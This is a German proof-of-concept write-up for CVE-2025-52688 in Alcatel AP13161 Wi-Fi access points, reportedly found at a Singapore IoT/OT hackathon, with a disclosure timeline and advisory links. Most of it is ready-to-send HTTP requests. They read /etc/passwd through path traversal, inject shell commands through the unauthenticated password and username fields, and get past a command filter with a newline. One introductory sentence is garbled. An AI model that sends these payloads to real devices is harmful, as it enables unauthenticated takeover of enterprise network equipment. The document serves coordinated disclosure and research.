
Proof-of-Concept-Exploits für CVE-2025-52688: nicht authentifizierte Befehlseinschleusung und beliebiges Dateilesen in den Enterprise-WLAN-Zugangspunkten Alcatel AP13161, entdeckt während eines IoT/OT-Hackathons.
Alcatel AP13161 - Enterprise WLAN Access Point
Es werden hier zwei Hauptschwachstellen behandelt:
; ermöglicht und zu einem Befehlsinjektionsangriff führt.fileName-Parametern, die ein nicht autorisiertes Lesen beliebiger Dateien auf dem Server ermöglicht.Diese Schwachstelle wurde während des SPIRICYBER-24 IoT/OT Hackathons entdeckt, der von der CSA (Cybersecurity Agency of Singapore) und der NTU organisiert wurde.
Der Parameter fileName ermöglicht es jedem nicht authentifizierten Benutzer, beliebige Dateien auf dem System einzusehen. Durch das Navigieren durch die Verzeichnisse können wir sensible Dateien auf dem Server lesen.
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"username":"xxx",
"method":"downloader.cert",
"params":{
"fileName":"/../../etc/passwd"
}
}
Der Parameter password am Endpunkt /apiaccess ist anfällig für eine nicht authentifizierte Befehlsinjektionsschwachstelle, die es jedem nicht authentifizierten Benutzer ermöglicht, Systembefehle auszuführen.
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{
"id":1,
"jsonrpc":"2.0",
"method":"system.getPvc",
"params":{
"username": "Administrator",
"password":";echo pwned1234 > /tmp/test.txt"
}
}
Der Parameter username am Endpunkt echo.fcgi ist anfällig für eine nicht authentifizierte Befehlsinjektionsschwachstelle, die es jedem nicht authentifizierten Benutzer ermöglicht, Systembefehle auszuführen.
POST /echo.fcgi HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*
{
"id":1,
"jsonrpc":"2.0",
"username":"Administrator",
"method":"user.logout",
"params":{
"username": ";echo pwned > /tmp/test.txt",
"Sessionid":""
}
}
Der Parameter command ermöglicht authentifizierten Benutzern, Systemfunktionen und Binärdateien auszuführen, um die Funktionalität des Lampenpfostens zu testen. Aufgrund unzureichender Eingabefilterung und Blacklist können wir jedoch die Filter umgehen, um eine authentifizierte Remote-Codeausführung durchzuführen, die es jedem eingeloggten Benutzer ermöglicht, Systembefehle auszuführen.
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"method":"expressmessage.call",
"username":"Administrator",
"session":"XXXXXX",
"topic":"WMA/DC:XXXXXXX",
"params":{
"version":"3.0",
"messageID":1,
"macAddress":"DC:XXXXX",
"option":"update",
"method":"ap_manage.exce_command",
"contents":{
"command":"tech_support_command 9 127.0.0.1\nid"
}
}
}
2024-08-10: Bericht an das Triage-Team des SpiritCyber IoT Hackathons eingereicht
2024-08-20: Bericht vom Triage-Team angenommen
2025-06-25: CSA SingCert weist CVE-2025-52688 zu
2025-07-14: Öffentliche Offenlegung
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072
https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf